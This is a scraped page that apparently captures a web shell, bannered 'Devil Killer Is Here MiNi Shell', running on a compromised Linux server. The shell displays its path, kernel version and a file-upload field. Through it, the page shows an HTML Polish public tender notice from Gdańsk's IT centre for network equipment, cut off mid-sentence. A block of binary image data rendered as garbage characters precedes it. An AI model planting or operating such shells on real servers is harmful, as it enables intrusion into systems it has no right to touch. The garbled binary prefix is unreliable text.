JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210720/0012001701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00120017 z dnia 2021-07-20</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa urządzeń sieciowych na potrzeby Gminy Miasta Gdańska. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GDAŃSKIE CENTRUM INFORMATYCZNE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367708720</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. prof. Witolda Andruszkiewicza 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-601</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">58 768 82 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@gdansk.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://gci.gdansk.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> IT </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa urządzeń sieciowych na potrzeby Gminy Miasta Gdańska. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4ca779b8-e894-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00120017</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000974/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Dostawa urządzeń sieciowych na potrzeby Gminy Miasta Gdańska</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Oferty wraz z załącznikami należy<br/>składać poprzez: https://miniportal.uzp.gov.pl z wykorzystaniem platformy ePUAP-u<br/>https://epuap.gov.pl/wps/portal/strefa-klienta/katalog-spraw/profil-urzedu/GCIGdansk<br/>2. Komunikacja elektroniczna:<br/>1) Wykonawca zobowiązany jest podać adres e-mail, na który prowadzona będzie korespondencja<br/>związana z postępowaniem.<br/>2) Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują Zamawiającemu:<br/>drogą elektroniczną, za pośrednictwem poczty elektronicznej na adres e-mail: zp@gdansk.gda.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta<br/>powinna być sporządzona w języku polskim, w formacie danych .doc, .docx, pdf. Podmiotowe środki<br/>dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w<br/>ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt..<br/>Ofertę, a także oświadczenie o jakim mowa w art. 125 ust. 1 ustawy Pzp składa się, pod rygorem<br/>nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>2. Sposób sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie oraz w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z<br/>dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać Zamawiający od Wykonawcy.<br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wszelka<br/>korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>4. W przypadku dokumentów składanych za pomocą poczty elektronicznej, za datę ich przekazania<br/>uznaje się datę ich przekazania na serwer Zamawiającego. <br/>5. Każda ze stron na żądanie drugiej, niezwłocznie potwierdza fakt otrzymania w/w wniosków,<br/>zawiadomień oraz informacji.<br/>Dowód transmisji danych oznacza, że Wykonawca otrzymał korespondencję w momencie jej<br/>przekazania przez Zamawiającego, niezależnie od ewentualnego potwierdzenia faktu jej otrzymania.<br/>Zamawiający w żaden sposób nie ponosi odpowiedzialności za niesprawne działanie urządzeń<br/>Wykonawcy.<br/>6. Sposób złożenia oferty, w tym zaszyfrowania oferty został opisany w aktualnym Regulaminie<br/>korzystania z miniPortalu.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz komunikacji wynosi 150 MB.<br/>8. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datę ich przekazania na ePUAP.<br/>9. Oferta wraz z wymaganymi załącznikami (lub wycofanie oferty w rozumieniu art. 219 ust. 2 ustawy<br/>Pzp) należy składać wyłącznie przy użyciu miniPortalu (https://miniportal.uzp.gov.pl/, ePUAP-u<br/>https://epuap.gov.pl/wps/portal/strefaklienta/<br/>katalogspraw/profil-urzedu/GCIGdansk), adres skrytki Zamawiającego: GCIGdansk/SkrytkaESP.<br/>10. Zmiana oferty jest dopuszczona jedynie w przypadku wycofania oferty złożonej poprzednio.<br/>11. Sposób złożenia oferty w tym zaszyfrowania oferty opisany został w aktualnej Instrukcji<br/>użytkowania miniPortalu. Zamawiający udostępnia ID postępowania jako załącznik do dokumentacji<br/>zamówienia. Dane postępowanie można wyszukać również na Liście wszystkich postępowań klikając<br/>wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na miniPortalu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu jakich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:1. administratorem Pani/Pana danych osobowych jest<br/>Gdańskie Centrum Informatyczne ul. Prof. Witolda Andruszkiewicza 5, 80-601 Gdańsk.2. administrator<br/>wyznaczył Inspektora Danych Osobowych, z którym można się kontaktować pod adresem e-mail:<br/>iod@gdansk.gda.pl3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego,<br/>prowadzonym w trybie wskazanym w rozdziale II.4. odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74<br/>ustawy Pzp.5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Pzp. przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; 6. obowiązek podania<br/>przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisanych ustawy Pzp., związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego. 7. w odniesieniu do Pani/Pana danych osobowych decyzje nie<br/>będą podejmowane w sposób automatyzowany, stosownie do art. 22 RODO.<br/>8. posiada Pani/Pan: 1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora<br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty<br/>postępowania o udzielenie zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty<br/>zakończonego postępowania o udzielenie zamówienia); 2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz<br/>jego załączników); 3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie<br/>zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo<br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; 2) prawo do przenoszenia danych<br/>osobowych, o którym mowa w art. 20 RODO; 3) na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/7/D/2021/D</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa urządzeń sieciowych na potrzeby Gminy Miasta Gdańska </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32424000-1 - Infrastruktura sieciowa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32427000-2 - System sieciowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Łączna liczba punktów, jaką Wykonawca może uzyskać: 100<br/>1) Cena – waga 60 pkt.<br/>Wykonawca może uzyskać maksymalnie 60 pkt;<br/>Ocena punktowa dokonana zostanie według poniższego wzoru:<br/>Lpc= Cn/Cbo*60 pkt.<br/>Lpc - Liczba punktów przyznanych badanej ofercie<br/>Cn - Najniższa cena wśród złożonych ofert (ofert ważnych, niepodlegających odrzuceniu)<br/>Cbo - Cena badanej oferty<br/>Jakość – waga 40 pkt<br/>Wykonawca może uzyskać maksymalnie 40 pkt.,<br/>	Informacje na temat punktowanych parametrów technicznych Urządzeń wraz z ich rangą:<br/>L.p.	Wymagany parametr	Oferowany parametr	Liczba punktów<br/>1	Obsługa protokołów routingu	Routing statyczny (obligatoryjnie)	0<br/> RIP, OSPF do 1000 tras 5<br/>2	Wydajność stosu	40 Gbps (obligatoryjnie)	0<br/> 80 Gbps	10<br/>3	Redundancja zasilania NIE	0<br/> TAK	10<br/>4	Gwarancja	24 m-ce (obligatoryjnie) 0<br/> 36 miesięcy 5<br/> Live Time**	15<br/>**Uwaga: jeżeli Wykonawca zaoferuje gwarancję Live Time to uzyska 15 punktów. <br/> <br/> Łączna liczba punktów badanej oferty<br/> Liczba<br/> punktów = ____________________________ x 40 pkt. przyznanych<br/> badanej ofercie Maksymalna liczba punktów <br/> możliwa do zdobycia <br/> <br/>Zamawiający dokona kalkulacji łącznej liczby punktów badanej oferty na podstawie danych uzyskanych z wypełnionej przez Wykonawcę w Formularzu Oferty Tabeli parametrów technicznych dodatkowo punktowanych. W przypadku nie wypełnienia Tabeli parametrów technicznych dodatkowo punktowanych dla danego Urządzenia, Zamawiający uzna, że Wykonawca zaoferował Urządzenia spełniające minimalne wymagania obligatoryjne postawione do postępowania, nie spełniające wymagań dodatkowo punktowanych i otrzyma 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek zdolności technicznej lub zawodowej - Zamawiający uzna warunek za spełniony, jeżeli<br/>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie wykaże się realizacją co najmniej dwóch zamówień polegających na dostawie urządzeń sieciowych o łącznej wartości nie mniejszej niż kwota 200 000,00 zł brutto, dla każdego z zamówień lub jedno zamówienie o łącznej wartości nie mniejszej niż 400 000,00 zł brutto. <br/>W przypadku złożenia przez Wykonawców dokumentów na potwierdzenie spełniania warunków<br/>udziału w postępowaniu, w których jakiekolwiek kwoty podane zostały w walutach obcych,<br/>Zamawiający przeliczy te kwoty na PLN według średniego kursu Narodowego Banku Polskiego<br/>(dalej NBP), obowiązującego w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu NBP nie publikuje informacji o<br/>średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń według średniego kursu z<br/>pierwszego kolejnego dnia, w którym NBP opublikuje w/w informacje. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. ODPIS Z WŁAŚCIWEGO REJESTRU LUB Z CENTRALNEJ EWIDENCJI I INFORMACJI O<br/>DZIAŁALNOŚCI GOSPODARCZEJ, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>w celu wykazania braku podstaw do wykluczenia w oparciu o art. 109 ust. 1 pkt. 4 ustawy Pzp,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji.<br/>2. WYKONAWCA, KTÓRY POSIADA SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA POZA<br/>TERYTORIUM RZECZYPOSPOLITEJ POLSKIEJ Jeżeli Wykonawca ma siedzibę lub miejsce<br/>zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w ust.<br/>1: 1) składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że nie otwarto likwidacji ani nie ogłoszono upadłości – nie<br/>wcześniej niż 3 miesiące przed ich złożeniem.<br/>2) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 1 powyżej, zastępuje się je odpowiednio w całości lub w części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą lub jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Dokumenty powinny być wystawione w terminach, odpowiednio dla wymaganych w postępowaniu dokumentów.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. WYKAZ DOSTAW wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, oraz z załączeniem DOWODÓW określających, czy te dostawy zostały wykonane lub są wykonywane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających<br/>się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>2. W przypadku, gdy Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu – polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych wraz z ofertą składa:<br/>1) zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy<br/>potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów oraz oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. 2) oświadczenie podmiotu udostępniającego zasoby potwierdzające brak podstaw wykluczenia tego podmiotu oraz 